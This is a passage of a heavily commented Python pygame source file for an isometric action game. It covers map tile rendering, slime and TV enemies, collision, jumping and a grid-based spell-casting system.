rectangle passed as parameter\n screen.blit(arrow_text,arrow_text_rect)\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n if event.type == pygame.MOUSEBUTTONDOWN and arrow_text_rect.collidepoint(mx,my): # check for when the user presses the arrow\n running = False # stop the loop so that the program starts executing the main game loop\n\n if intro_framecount < 59:\n intro_framecount += 1\n else:\n intro_framecount = 0\n\n clock.tick(60)\n pygame.display.update()\n\n# main loop ----------------------------------------------------------------------------------------------------------------#\nwhile game_running:\n # important game variables\n blocks = [] # holds the block tiles\n trees = [] # holds the tree tiles\n rocks = [] # holds the rock tiles\n char_center = (char_x - game_scroll[0] + 40,char_y - game_scroll[1] + 45) # this location represents the center of the character at all times // used for tile rendering\n character_hitbox = pygame.Rect(char_x - game_scroll[0] + 10, char_y - game_scroll[1] + 10, 70, 90) # Rect object representing the character's overall hitbox\n character_feet_hitbox = pygame.Rect(char_x - game_scroll[0] + 10, char_y - game_scroll[1] + 80, 70, 20) # Rect object representing the character's smaller feet hitbox\n\n # background\n screen.fill(active_bg_col)\n create_bg(active_bg_col2)\n\n # control game scroll\n game_scroll[0] += (char_x - game_scroll[0] - 450 + 37) / 40\n game_scroll[1] += (char_y - game_scroll[1] - 300 + 50) / 40\n\n # event detection -----------------------------------------------------#\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n if event.type == pygame.KEYDOWN: # handle all events regarding keys being pressed down\n if event.key == pygame.K_w: # if 'w' was pressed, char is moving up. set char_up to True\n char_up = True\n if event.key == pygame.K_s: # same concept as with 'w' key\n char_down = True\n if event.key == pygame.K_a:\n char_left = True\n if event.key == pygame.K_d:\n char_right = True\n if event.key == pygame.K_SPACE and char_jump is False and char_fall is False: # if space was pressed, the character isn't already jumping, and they are not currently falling\n char_current_animation, char_current_frame = change_animation(char_current_animation,char_current_frame,'jump',char_animation_lock) # changes the current ani. to 'jump' and sets current frame to 0\n char_animation_lock = True # lock animation so that character's animation will not change to 'walk' if user presses WASD\n char_prev_ypos = char_y # store char's y pos before they jump\n char_jump = True\n char_acceleration = 20 # set character's acceleration\n if event.key == pygame.K_r and not char_alive: # handle level retrying: if the character is dead and the user presses 'r', this executes\n level_retry = True\n if event.key == pygame.K_e: # for opening level scroll, executes if 'e' is pressed\n scroll_obj[1] = not scroll_obj[1] # changes the scroll's active state to the inverse of what it was before (if on, turns off // if off, turns on)\n if event.type == pygame.KEYUP: # handle all events regarding keys being lifted up\n if event.key == pygame.K_w: # if 'w' is lifted up, the char is no longer moving up. set char_up to False\n char_up = False\n if not char_jump: # if the character is currently not jumping (and also 'w' is lifted up), this will execute\n char_current_animation, char_current_frame = change_animation(char_current_animation,char_current_frame,'idle',char_animation_lock) # change animation to 'idle'\n if event.key == pygame.K_s: # same concept as with 'w'\n char_down = False\n if not char_jump:\n char_current_animation, char_current_frame = change_animation(char_current_animation,char_current_frame,'idle',char_animation_lock)\n if event.key == pygame.K_a:\n char_left = False\n if not char_jump:\n char_current_animation, char_current_frame = change_animation(char_current_animation,char_current_frame,'idle',char_animation_lock)\n if event.key == pygame.K_d:\n char_right = False\n if not char_jump:\n char_current_animation, char_current_frame = change_animation(char_current_animation,char_current_frame,'idle',char_animation_lock)\n\n # rendering map --------------------------------------------------------------------------------------------------#\n\n enemy_tiles = [[]] # list of lists: each list inside represents all Rect objects which make up a single enemy territory. there is one slime per territory\n first_etf = False # bool variable which turns True once the first enemy tile in the map has been found\n pfet = 0 # previous first enemy tile - holds the y-value of the previous row where an enemy tile was found\n for y, tile_row in enumerate(current_map): # this nested for loop iterates through each 'tile' in current_map, which holds all tiles (represented by characters, check map text files for more info)\n found_e_tile = False # becomes True once an enemy tile has been found in the current row\n for x,tile in enumerate(tile_row):\n if tile != \"0\" and tile != \"4\" and tile != \"5\": # every tile that is not '0', '4' or '5' # requires a base/ground tile which the player can walk on\n block_rect = pygame.Rect((200 + x * bv - y * bv) - game_scroll[0], (10 + x * bv + y * bv) - game_scroll[1], 101, 101) # create a Rect object whose coords depend on the current x/y values of the for loop, and game scroll\n green_block_rect = pygame.Rect((200 + x * bv - y * bv) - game_scroll[0], (10 + x * bv + y * bv) - game_scroll[1],green_block.get_width(),green_block.get_height()) # create a Rect whose coords again depend on x/y, where the tile Surface will be displayed\n blocks.append([block_rect,green_block_rect]) # each pair of rectangles is appended as a list to 'blocks', which holds all tiles the game will render later\n if tile == \"2\": # tile num. 2 represents a tree\n tree_rect = pygame.Rect((200 + x * bv - y * bv) - game_scroll[0] - 10, (10 + x * bv + y * bv) - game_scroll[1] - green_tree.get_height() + 80, green_tree.get_width(),green_tree.get_height()) # create Rect obj for tree to be blitted, same concept as before\n tree_hitbox = pygame.Rect((200 + x * bv - y * bv) - game_scroll[0] + 10, (10 + x * bv + y * bv) - game_scroll[1] - green_tree.get_height() + 80, green_tree.get_width()-20,green_tree.get_height()-20) # create Rect obj for the tree's hitbox\n trees.append([tree_rect,tree_hitbox]) # append as a list both the location Rect and hitbox Rect\n else: # 'blocks', 'trees' and 'rocks' are all related lists, so we must append None if the tile is not a tree to keep the same order\n trees.append(None)\n if tile == \"3\": # tile num. 3 represents a rock. loaded in the same exact way as trees are\n rock_rect = pygame.Rect((200 + x * bv - y * bv) - game_scroll[0] + 10, (10 + x * bv + y * bv) - game_scroll[1] + 5, green_rock.get_width(),green_rock.get_height())\n rock_hitbox = pygame.Rect((200 + x * bv - y * bv) - game_scroll[0] + 10, (10 + x * bv + y * bv) - game_scroll[1] + 25, green_rock.get_width(),green_rock.get_height() // 2)\n rocks.append([rock_rect,rock_hitbox])\n else:\n rocks.append(None)\n if tile == \"6\" and not found_tvs: # tile num. 6 represents a TV enemy. found_tvs becomes True after the very first iteration of the game loop, thus this if statement occurs once\n tv_rect = pygame.Rect((200 + x * bv - y * bv) - game_scroll[0] + 10, (10 + x * bv + y * bv) - game_scroll[1] + 5, broken_tv.get_width(),broken_tv.get_height())\n # tv_hitbox = pygame.Rect((200 + x * bv - y * bv) - game_scroll[0] + 10, (10 + x * bv + y * bv) - game_scroll[1] + 25, broken_tv.get_width(),broken_tv.get_height() // 2)\n tv_object = tv_obj.copy() # create a copy of the tv_obj list, which holds all potential attributes of a TV\n tv_object[1] = tv_rect # give the object tv_rect, the location where it is to be blitted\n tv_object[3] = [] # required because of how list pointers work\n active_tvs.append(tv_object) # append to list 'active_tvs' the tv object\n if tile == \"e\": # checks for enemy tile. this entire conditional is an algorithm which appends to the last list 'enemy_tiles' if an enemy tile is a part of an already existing territory. if not, it appends an empty list to 'enemy_tiles' to symbolize a different territory\n if not first_etf: # this conditional executes once per frame. once the first enemy tile is found bool var 'first_etf' becomes True\n pfet = y # set the previous first tile to the current y value, because for the first enemy tile there is no 'previous enemy tile'\n first_etf = True\n found_e_tile = True\n if not found_e_tile: # for every row of tiles, bool var found_e_tile is False until an e tile is found\n if y - 1 == pfet: # if this first enemy tile has a y value of 1 more than pfet, it must be a part of the same enemy territory\n enemy_tiles[-1].append(block_rect) # append the Rect tile to the last list in enemy_tiles\n pfet = y # update pfet to the current y value, so that the next row tests against this value\n found_e_tile = True # set found_e_tile to True so this conditional can only execute once\n else: # this will execute if the current y value has a difference more than 1 with pfet\n enemy_tiles.append([]) # create an empty list to represent a new enemy territory\n enemy_tiles[-1].append(block_rect) # append to the last list, i.e the one we just created the Rect object\n pfet = y # update pfet for next iteration\n found_e_tile = True # set to True so this conditional can only execute once per row\n else: # this will execute once an enemy tile has already been found in the row\n enemy_tiles[-1].append(block_rect) # if an enemy tile exists in the row, the tile must belong with that enemy tile's territory\n elif tile == \"4\": # tile num. 4 represents a bridge.\n block_rect = pygame.Rect((200 + x * bv - y * bv) - game_scroll[0],(10 + x * bv + y * bv) - game_scroll[1], 101, 101)\n bridge_rect = pygame.Rect((200 + x * bv - y * bv) - game_scroll[0],(10 + x * bv + y * bv) - game_scroll[1], bridge.get_width(),bridge.get_height())\n blocks.append([block_rect, bridge_rect])\n trees.append(None)\n rocks.append(None)\n elif tile == \"5\": # tile num. 5 represents a bridge facing diagonally to the right (same bridge tile as before, but mirrored)\n block_rect = pygame.Rect((200 + x * bv - y * bv) - game_scroll[0],(10 + x * bv + y * bv) - game_scroll[1], 101, 101)\n bridge_rev_rect = pygame.Rect((200 + x * bv - y * bv) - game_scroll[0],(10 + x * bv + y * bv) - game_scroll[1], bridge_reverse.get_width(),bridge_reverse.get_height())\n blocks.append([block_rect, bridge_rev_rect, 'r']) # additionally append string lateral 'r', which stands for reverse. this allows the program to diffrentiate from left/right facing bridges\n trees.append(None)\n rocks.append(None)\n\n # create the list of enemies\n if len(active_enemies) == 0: # list 'active_enemies' will be empty during the very first frame of each level\n for _ in enemy_tiles: # enemy_tiles is a list of lists, containing all the enemy territories (which are made up of sequences of tiles)\n active_enemies.append(slime_obj.copy()) # for each territory, append a copy of slime_obj as there will be one slime per territory\n\n # save number of tvs\n if not found_tvs: # will only execute once per level\n number_of_tvs = len(active_tvs)\n found_tvs = True # once we have saved the original number of TVs, bool var found_tvs becomes False\n\n # hold the original number of enemies on the stage. e.g if ZONE 1 has 5 enemies, this will store 5 every frame\n number_of_enemies = len(active_enemies) + len(active_tvs) # take the sum of the list lengths of active_enemies and active_tvs, as they are the mobs the player fights\n\n # create a list ONCE containing boolean values for each tile // this is for creating a 'render distance' effect\n if not found_tiles:\n tile_render_states = [False for block in blocks] # each block tile will get its own bool var starting at False. once it becomes True, the block is permanently rendered on the screen for that level\n found_tiles = True\n\n # checking if a certain tile should be rendered on screen\n for num, block_info in enumerate(blocks): # use enumerate to keep track of the block number, as tile_render_states is a related list\n block_center = (block_info[1].x + block_info[1].w // 2, block_info[1].y + block_info[1].h // 2) # represent the center of actual tile image. block_info[1] corresponds to 'green_block_rect', has same dimensions as the tile's image\n\n if m.check_rect_distance(char_center,block_center,500): # func returns True if distance between character's current center and the block_center created just above is less than 500\n tile_render_states[num] = True # set the current block's render state to True\n\n if tile_render_states[num]: # if a tile's render state is True, blit its actual Surface onto the screen depending on its dimensions\n if block_info[1].h == 170: # the ground tile's Surface height is 170, so this will blit a ground tile at the specified location (block_info[0]) holds the blit location in the form of a Rect\n screen.blit(active_block, block_info[0])\n elif block_info[1].h == 169 and 'r' not in block_info: # the bridge tile has a height of 169. if 'r' is not found, it will blit a left facing bridge at the specified location\n screen.blit(bridge, block_info[0])\n else: # otherwise, the base tile must be a reverse bridge, so blit a reversed bridge at the specified location\n screen.blit(bridge_reverse, block_info[0])\n\n if trees[num] is not None: # if at the current index a tree list is found (looks like this [tree_rect,tree_hitbox]), blit a tree at that location\n screen.blit(active_tree,trees[num][0])\n if rocks[num] is not None: # if at the current index a rock list is found, blit a rock at the location\n screen.blit(active_rock,rocks[num][0])\n\n for j, area in enumerate(enemy_tiles): # iterate through each territory (area) in enemy_tiles\n for i, e_tile in enumerate(area): # iterate through each individual tile in the area\n if i == 0 and active_enemies[j][1][0] == 0 and active_enemies[j][1][1] == 0: # active_enemies[j][1] represents the slime at index j's location, in the form of [x,y]. this conditional will evaluate once for each slime object as they start off with location [0,0]\n active_enemies[j][1] = [e_tile.x, e_tile.y] # this represents the slime's spawning location within its territory. it is the first tile in the upper left corner of its area.\n active_enemies[j][3].append(e_tile) # append each 'territory tile' to slime's territory tiles list\n\n # handling all enemy actions, drawing the enemy, moving it, etc. -------------------------------------------------------------------#\n for e_num, enemy in enumerate(active_enemies): # iterate through each slime enemy in active_enemies, var enemy represents a list containing all necessary info\n enemy_loc = enemy[1] # store the current enemy's location, enemy_loc is in the form of [x,y]\n enemy_left = False # bool val to check whether or not a slime has left its territory\n\n if enemy[6] == 'move': # index 6 represents the slime's animation. if it is 'move', set the enemy's current frame (animation) to its default\n enemy_cf = animations_dictionary[enemy[0]][enemy[2]] # enemy_cf stands for enemy current frame and holds a frame name (e.g slime0). enemy[0] is equal to 'slime' and enemy[2] holds the slime's frame number, so that new frames can be are played\n else: # slime has two possible animations, the other being when it is hurt\n enemy_cf = animations_dictionary['slime_dmg'][enemy[2]] # set the current frame to be a part of the 'slime_dmg' animation\n\n enemy_surf = animation_frame_surfaces[enemy_cf] # given the name of the frame, grab its actual Surface to be blitted from dictionary\n enemy_surf.set_alpha(enemy[9]) # enemy[9] represents the alpha each slime frame should have. this allows the slime to 'fade out' once it dies\n enemy[5] = pygame.Rect(enemy_loc[0] - game_scroll[0],enemy_loc[1] - game_scroll[1],animation_frame_surfaces[enemy_cf].get_width(),animation_frame_surfaces[enemy_cf].get_height()) # create a Rect object representing the enemy's current hitbox, which is offsetted by the game's scroll\n\n if char_loaded: # bool val that turns True once character's hitboxes are created, because as of now they do not exist\n if not char_up: # if the character is not moving upwards, its hitbox will be its feet\n if enemy[5].colliderect(character_feet_hitbox) and enemy[9] >= 255: # check for slime hitbox + char hitbox collision and also if whether or not the slime is on the screen (alpha >= 255)\n char_alive = False # if collision occured, character is dead, set char_alive to False\n else: # otherwise, its hitbox will be its shadow\n if enemy[5].colliderect(character_feet_shadow) and enemy[9] >= 255:\n char_alive = False\n\n if enemy[7]: # bool val // if true, display slime's HP bar\n screen.blit(hp_bar,[enemy_loc[0] - game_scroll[0] + 15, enemy_loc[1] - game_scroll[1] - 20]) # blit hp_bar on screen\n health_val = pygame.Rect(enemy_loc[0] - game_scroll[0] + 20, enemy_loc[1] - game_scroll[1] - 16, enemy[8] * 25, 8) # display the slime's current HP value\n pygame.draw.rect(screen,(255,0,0),health_val,0) # draw the health value Rect\n\n if enemy[8] <= 0: # enemy[8] represents the HP of the slime. if it is 0 or less, start making the enemy 'fade out' (decrease its alpha val)\n enemy[9] -= 40 # decrease alpha\n\n screen.blit(enemy_surf,[enemy_loc[0] - game_scroll[0], enemy_loc[1] - game_scroll[1]]) # blit the enemy Surface\n enemy[2] += 1 # increase each enemy's current frame number by 1 each iteration\n\n # handle enemy movement ----------------------------------------#\n # moving enemy on screen // enemy[4] represents the current direction the slime is heading in\n if enemy[4] == 'right': # due to isometric rendering, 'right' is diagonal to the bottom right\n enemy[1][0] += 0.5\n enemy[1][1] += 0.5\n elif enemy[4] == 'left': # isometric rendering, left is diagonal to the top left\n enemy[1][0] -= 0.5\n enemy[1][1] -= 0.5\n elif enemy[4] == 'up': # isometric rendering, up is diagonal to the top right\n enemy[1][0] += 0.5\n enemy[1][1] -= 0.5\n elif enemy[4] == 'down': # isometric rendering, down is diagonal to the bottom left\n enemy[1][0] -= 0.5\n enemy[1][1] += 0.5\n\n # check if enemy left territory\n for territory_tile in enemy[3]: # this will iterate through each territory tile in its territory/area\n if territory_tile.colliderect(enemy[5]): # if at any point the slime is still inside its territory, i.e collides with one of its tiles, break\n break\n else: # if the for loop finishes executing, that means the slime has not collided with any territory tiles\n enemy_left = True # slime has left, set enemy_left to True\n\n # handle direction changing\n if enemy_left: # first check if enemy has left its territory\n direc = enemy[4] # save the location the slime is currently travelling in\n if direc == 'right': # the enemy will change direction depending on the direction it was moving before it exited its territory\n enemy[4] = 'down'\n enemy[1][0] -= 25 # once the slime has left its territory, it needs to be set back inside it\n enemy[1][1] -= 25\n elif direc == 'left':\n enemy[1][0] += 25\n enemy[1][1] += 25\n enemy[4] = 'up'\n elif direc == 'up':\n enemy[1][0] -= 10\n enemy[1][1] += 10\n enemy[4] = 'right'\n elif direc == 'down':\n enemy[1][0] += 10\n enemy[1][1] -= 10\n enemy[4] = 'left'\n enemy_left = False # once the enemy has changed direction and is reset back into its territory, set this back to False\n\n if enemy[2] >= len(animations_dictionary[enemy[0]]) and enemy[6] == 'move': # if the current frame is equal to the last index of its current animation list, reset frame count to 0\n enemy[2] = 0 # reset frame count to 0\n elif enemy[2] >= len(animations_dictionary['slime_dmg']) and enemy[6] == 'hurt': # reset frame number if it is equal to the max index of animation 'hurt'\n enemy[2] = 0\n enemy[6] = 'move' # additionally once the hurt animation is over, change animation back to 'move'\n\n enemy[3] = [] # clear the enemy's territory tiles\n\n if enemy[9] <= 0: # once the enemy is completely invisible (alpha <= 0)\n number_of_enemies -= 1 # subtract one from enemy counter\n enemy[7] = False # don't show hp bar\n\n # handling all tv actions -----------------------------------------------------------------------------------#\n for tv_num,tv in enumerate(active_tvs): # iterate through each tv (each tv is a list containing all its info)\n tv[0].set_alpha(tv[6]) # set the alpha of the tv's Surface being blitted to the alpha value stored in its list\n tv[2] = pygame.Rect(tv[1][0] - game_scroll[0], tv[1][1] - game_scroll[1], broken_tv.get_width(), broken_tv.get_height()) # create and store the tv hitbox in the tv list\n screen.blit(tv[0],(tv[1][0] - game_scroll[0], tv[1][1] - game_scroll[1])) # displays the actual TV image/Surface\n\n if tv[2].colliderect(character_feet_hitbox) and tv[5]: # if the tv hitbox collides with the character's feet hitbox, and the tv is not destroyed\n char_alive = False # set character to dead\n\n if frame_count == 59 and tv[5]: # for every 59th frame, if the tv is not destroyed, this will execute\n tv[4] += tv[6] # increase the tv's bullet angle by the current angle stored in tv[6]\n tv[4] = 0 if tv[4] > 360 else tv[4] # reset angle back to 0 if angle is greater than 360, keeps numbers small\n b_loc = [tv[2].x + tv[2].w//2 + game_scroll[0], tv[2].y + tv[2].h//2 + game_scroll[1]] # create the spawn point for the bullets\n tv[3].extend(m.create_bullet(b_loc,tv[4])) # create_bullet returns a list of 4 bullets, each with varying angles. extend the tv's bullet list with these 4\n if len(tv[3]) >= 20: # if the bullet list contains 20 or more bullets, delete the first 4 bullets in the list\n del tv[3][:5]\n\n if len(tv[3]) != 0: # only executes if there are bullets in the tv's bullet list\n for b in tv[3]: # for loop to iterate through each bullet\n b[0][0] += b[1][0] # b[0] contains the bullet's location ([x,y]), b[1] contains bullet's x/y velocity ([x,y]). this line adds x velocity to the x cord\n b[0][1] -= b[1][1] # subtract y velocity from bullet's y cord because of pygame's inverted y-axis\n b_hitbox = pygame.Rect(b[0][0] - bullet.get_width()//2 - game_scroll[0], b[0][1] - bullet.get_height()//2 - game_scroll[1], bullet.get_width(), bullet.get_height()) # create the bullet's hitbox\n screen.blit(bullet,(b[0][0] - bullet.get_width()//2 - game_scroll[0], b[0][1] - bullet.get_height()//2 - game_scroll[1])) # draw the bullet onto the screen\n\n if b_hitbox.colliderect(character_hitbox): # if the bullet hitbox collides with the character, they die\n char_alive = False\n\n if not tv[5]: # start decreasing its alpha if hit by spell\n tv[6] -= 40\n\n if tv[6] <= 0: # once the alpha is 0 or less, always set the alpha to 0 and subtract from num of enemies\n tv[6] = 0\n number_of_enemies -= 1\n\n # making glitch effect for spell casting ----------------------------------------------#\n if spell_cast[0]: # if player clicked mouse one (the 3x3 grid is opening)\n glitch_bg, glitch_bg_sl, glitch_bg_fl, frame_bg = e.create_glitch_effect(gsl,frame=spell_bg.copy())\n\n # display all glitch layers\n screen.blit(glitch_bg,(spell_cast[1][0] - glitch_bg.get_width() // 2, spell_cast[1][1] - glitch_bg.get_height() // 2))\n screen.blit(glitch_bg_sl, (spell_cast[1][0] - glitch_bg_sl.get_width() // 2, spell_cast[1][1] - glitch_bg_sl.get_height() // 2))\n screen.blit(glitch_bg_fl, (spell_cast[1][0] - glitch_bg_fl.get_width() // 2, spell_cast[1][1] - glitch_bg_fl.get_height() // 2))\n screen.blit(frame_bg,(spell_cast[1][0] - frame_bg.get_width() // 2, spell_cast[1][1] - frame_bg.get_height() // 2))\n\n mx, my = pygame.mouse.get_pos() # store current mouse position\n mb = pygame.mouse.get_pressed(3) # mousebutton // will contain a list indicating which mouse buttons from 1-3 have been pressed\n\n # character code -----------------------------------------------------#\n # detect collision\n for rock in rocks: # iterate through each rock in rock list\n if rock is not None: # if a rock exists, this will execute\n rock_hb = rock[1] # store rock hitbox\n if not char_jump: # if the character is not jumping, collision will occur with the character's feet hitbox\n collisions = m.check_collision(character_feet_hitbox,rock_hb) # returns a list holding four booleans, which represent the 4 side lengths of the hitbox. one boolean will equal True, indicating the specific side length the player collided with\n else: # if the character is jumping, collisions will occur with the character's shadow hitbox\n collisions = m.check_collision(character_feet_shadow,rock_hb)\n if collisions[0]: # if player collided with upper side of hitbox, repel char back upwards\n char_y -= 5\n elif collisions[1]: # if player collided with bottom, repel char downwards\n char_y += 5\n elif collisions[2]: # if player collided with left, repel char to the left\n char_x -= 5\n elif collisions[3]: # if player collided with right, repel char to the right\n char_x += 5\n\n for tree in trees: # same exact concept as with checking rock collisions\n if tree is not None:\n tree_hb = tree[1]\n if not char_jump:\n collisions = m.check_collision(character_feet_hitbox, tree_hb)\n else:\n collisions = m.check_collision(character_feet_shadow, tree_hb)\n if collisions[0]:\n char_y -= 5\n elif collisions[1]:\n char_y += 5\n elif collisions[2]:\n char_x -= 5\n elif collisions[3]:\n char_x += 5\n\n if not char_jump: # if the character is not jumping, its shadow hitbox will depend on its current 'char_y' val\n character_feet_shadow = pygame.Rect(char_x - game_scroll[0] + 10,char_y - game_scroll[1] + 80,70,20)\n else: # if char jumping, shadow must stay on the ground, location based on 'char_prev_ypos' which holds the y val right before the char jumps\n character_feet_shadow = pygame.Rect(char_x - game_scroll[0] + 10,char_prev_ypos - game_scroll[1] + 80,70,20)\n\n # character movement\n if char_alive: # character can only move if they are alive\n if char_up: # if character moving up, subtract from char_y\n char_y -= char_speed\n char_current_animation, char_current_frame = change_animation(char_current_animation,char_current_frame,'walk',char_animation_lock) # set animation to 'walk' if character is moving\n if char_jump: # if char is jumping and is moving up, move the prev_ypos up as well (so shadow is not stationary mid-jump)\n char_prev_ypos -= char_speed\n if char_down: # same idea, if char is moving down, add to char_y\n char_y += char_speed\n char_current_animation, char_current_frame = change_animation(char_current_animation,char_current_frame,'walk',char_animation_lock) # same idea, change animation to 'walk'\n if char_jump: # if char is jumping but is moving down, add to prev_ypos so shadow moves down the screen\n char_prev_ypos += char_speed\n if char_left:\n char_x -= char_speed\n char_current_animation, char_current_frame = change_animation(char_current_animation,char_current_frame,'walk',char_animation_lock)\n char_animation_flip = False\n if char_right:\n char_x += char_speed\n char_current_animation, char_current_frame = change_animation(char_current_animation,char_current_frame,'walk',char_animation_lock)\n char_animation_flip = True\n if char_jump: # handle character jumping\n char_y -= char_acceleration # subtract from char_y to move char upwards, once char_accel becomes negative the char will move downwards\n char_acceleration -= 1 # decrease char_accel to change the rate at which char_y is changing\n if char_y - game_scroll[1] + 90 > character_feet_shadow.y: # plus 90 to detect bottom edge of character // once char_y hits the top of the char's shadow location, jump is over\n char_jump = False # char has grounded, character is no longer jumping\n char_animation_lock = False # set animation lock to False so character can change animations\n char_current_animation, char_current_frame = change_animation(char_current_animation,char_current_frame,'idle',char_animation_lock) # set animation to idle as character has landed, reset char frame number to 0\n\n # check if character fallen\n block_touched = False # bool val which indicates whether or not the char is currently in contact with a block\n if not char_fall: # if the character is not falling off the map\n for num, block_hitbox in enumerate(blocks): # iterate through each block list, which holds each block hitbox\n if character_feet_shadow.colliderect(block_hitbox[0]): # block_hitbox[0] is where the hitbox is located. if the character's shadow is contacting it, this conditional becomes True\n display_shadow = True # display the shadow beneath the char\n block_touched = True\n else: # executes once for loop has exhausted\n if not block_touched: # if a block was not touched, do not display shadow beneath player\n display_shadow = False\n if not block_touched and not char_jump: # if a block was not touched + the character is not currently jumping, they will fall off the map\n char_fall = True\n char_acceleration = 10 # set acceleration for when char is falling\n\n if char_fall: # if character is falling, increase char_y so character moves downwards, increase accel so they move down increasingly fast\n char_y += char_acceleration\n char_acceleration += 1\n\n if char_acceleration >= 30: # once the player reaches a high enough accel (from falling off map) set alive state to False\n char_alive = False\n\n # spell casting code ------------------------------------------------------------------------#\n if mb[0]: # if mouse button one was pressed, this will execute\n spell_cast[0] = True # set spell active state to True\n if spell_cast[1][0] == 0 and spell_cast[1][1] == 0: # if no location exists in spell_cast, this will execute\n spell_cast[1] = [mx, my] # set spell 3x3 grid location to current mouse location (this will be the exact center of the grid)\n else: # if mouse button one is not being pressed, this will execute\n if len(spell_cast[3]) != 0: # check if the user connected any grid points while spell grid was active\n for spell_name, spell_info in spells_dictionary.items(): # iterate through each key + value pair in spells_dict\n spell_points, spell_cost = spell_info # unpack spell_info list into the points connected (spell_points) and the spell cost (spell_cost)\n if char_mana - spell_cost > 0: # check if the character has enough mana to cast the spell\n if spell_points == spell_cast[3]: # compare the points the user connected (spell_cast[3]) to spell_points in the dictionary. if there is a match, this will execute\n spell_cast[4][0] = spell_name # add to spell_cast the name of the spell which is being casted\n char_mana -= spell_cost # subtract the mana cost of the spell\n spell_cast[4][2] = spell_cast[1].copy() # give the current location the grid is being drawn at to the list containing the info on drawing the spell\n\n # everytime mb 1 is released, reset all spell-related variables\n spell_cast[0], spell_cast[2], spell_cast[3] = False, [], []\n spell_cast[1][0], spell_cast[1][1] = (0, 0)\n grid_point_diff, grid_points, active_point, gsl = 1, [], 4, 0\n grid_max = False\n\n if spell_cast[0]: # if spell grid is active, this will execute\n for y in range(3): # nested loop to draw each grid_point on the screen (3 rows, 3 columns)\n for x in range(3):\n grid_point_loc = [(spell_cast[1][0] - grid_point.get_width() // 2 - grid_point_diff * grid_scale) + x * grid_point_diff * grid_scale,(spell_cast[1][1] - grid_point.get_width() // 2 - grid_point_diff * grid_scale) + y * grid_point_diff * grid_scale] # create location of the grid point\n if grid_max and len(grid_points) < 9: # make sure grid_points can only contain 9 points at max\n grid_points.append(pygame.Rect(grid_point_loc[0], grid_point_loc[1], grid_point.get_width(),grid_point.get_height())) # append Rect object representing where the grid point is to be blitted\n screen.blit(grid_point, grid_point_loc) # draw the actual grid point image at the created location\n\n if len(grid_points) != 0: # True if there are grid points currently in the list\n pygame.draw.line(screen, (0, 0, 0), (grid_points[active_point][0] + grid_point.get_width() // 2,grid_points[active_point][1] + grid_point.get_height() // 2),(mx, my), 10) # draw line from current active point to mouse position\n for num, rect in enumerate(grid_points): # iterate through each grid point (which is actually a Rect obj) in the list, use enumerate to keep track of the grid point's associated number\n if rect.collidepoint(mx, my) and num != active_point: # check if the Rect obj collides with the current mouse position, as long as the Rect obj is not the one currently active\n spell_cast[2].append([(grid_points[active_point][0] + grid_point.get_width() // 2,grid_points[active_point][1] + grid_point.get_height() // 2),(rect.x + rect.w // 2, rect.y + rect.h // 2)]) # append the center of the grid point which is currently active, and the center of the grid point the mouse collided with\n spell_cast[3].append(num) # append the grid point which was contacted to point history\n active_point = num # active point now becomes the grid point which was just contacted\n\n if len(spell_cast[2]) != 0: # drawing the existing line connections\n for points in spell_cast[2]: # iterate through each list of points in line history, to draw the lines\n x1, y1 = points[0] # represents location of the active grid point\n x2, y2 = points[1] # represents location of the point the active grid point connected with\n pygame.draw.line(screen, (0, 0, 0), (x1, y1), (x2, y2), 10) # draw a line between these two points\n\n if grid_point_diff < 50: # this is used to scale the difference between grid points, once it is 50 or more, grid has reached its max size\n grid_point_diff += 5\n else: # stop increasing grid_point_diff\n grid_max = True # set grid_max to True to indicate grid has reached max size\n\n if gsl < 170: # grid side length // used to scale overall size of the grid\n gsl += 15 # increment by 15 if under 170\n\n # spell animation handling\n if spell_cast[4][0] != '': # check if a spell is currently stored, if one was cast\n current_spell_frame = animations_dictionary[spell_cast[4][0]][spell_cast[4][1]] # store the name of the frame to be displayed in the animation\n csf_surf = animation_frame_surfaces[current_spell_frame] # current spell frame surface // store the actual Surface/image to be displayed given the current frame name\n if spell_cast[4][0] == 'slash': # if user casted a 'slash' attack\n csf_center = (spell_cast[4][2][0] - csf_surf.get_width()//2, spell_cast[4][2][1] - csf_surf.get_height()//2) # create location for the current spell frame to be displayed at, will be the center of the grid\n csf_hitbox = pygame.Rect(csf_center[0], csf_center[1], csf_surf.get_width(), csf_surf.get_height()) # create the hitbox of the frame being displayed\n elif spell_cast[4][0] == 'thunder': # if user casted a 'thunder' attack\n csf_center = (spell_cast[4][2][0] - csf_surf.get_width()//2, spell_cast[4][2][1] - csf_surf.get_height() + 50) # create center of frame\n csf_hitbox = pygame.Rect(csf_center[0], csf_center[1] + 350, csf_surf.get_width(), csf_surf.get_height()-400) # create hitbox\n screen.blit(csf_surf, csf_center) # draw the actual frame of the spell at the center of the grid\n spell_cast[4][1] += 1 # increase spell's frame count by 1 so new frames in the animation are played\n if spell_cast[4][1] >= len(animations_dictionary[spell_cast[4][0]]): # once the animation is finished (frame count reached its max), reset the list holding all spell animation info\n spell_cast[4] = ['', 0, [0, 0]]\n\n # code for combat detection-----------------------------------------------------------------------#\n\n for enemy in active_enemies: # iterate through each enemy in enemy list\n if enemy[5].colliderect(csf_hitbox) and spell_cast[4][1] == 1 and char_alive: # check if enemy collided with spell hitbox, makes sure detection occurs once per spell cast and player is alive\n enemy[2] = 0 # set enemy current frame to 0 as new animation will play\n enemy[6] = 'hurt' # set animation to 'hurt' as the enemy is being hit by a spell\n enemy[7] = True # display the enemy's HP bar\n if spell_cast[4][0] == 'slash': # if user casted a slash attack, subtract 1 HP\n enemy[8] -= 1\n elif spell_cast[4][0] == 'thunder': # if user casted a slash attack, subtract 2 HP\n enemy[8] -= 2\n\n for tv in active_tvs: # iterate through each tv in tv list\n if tv[2].colliderect(csf_hitbox) and spell_cast[4][1] == 1: # if the spell hitbox collides with the tv hitbox, this will execute\n tv[5] = False # if tv[5] is False, the tv's alpha will start decreasing\n\n # code for displaying number of enemies ----------------------------------------------------------#\n # create text for the number of enemies\n enemy_number_text = enemy_counter_font.render('x ' + str(number_of_enemies), True, (255, 255, 255))\n enemy_number_text2 = enemy_counter_font.render('x ' + str(number_of_enemies), True, (0, 0, 0))\n enemy_number_text_rect = enemy_number_text.get_rect()\n enemy_number_text_rect2 = enemy_number_text2.get_rect()\n enemy_number_text_rect.center = (830, 180)\n enemy_number_text_rect2.center = (833, 183)\n\n # character graphics code ------------------------------------------------------------------------#\n\n if not char_alive: # check if player is not alive\n if animations_dictionary['death'] == '': # only executes when no animation is loaded in under the key 'death'\n if save_screen is None: # store value in save_screen only 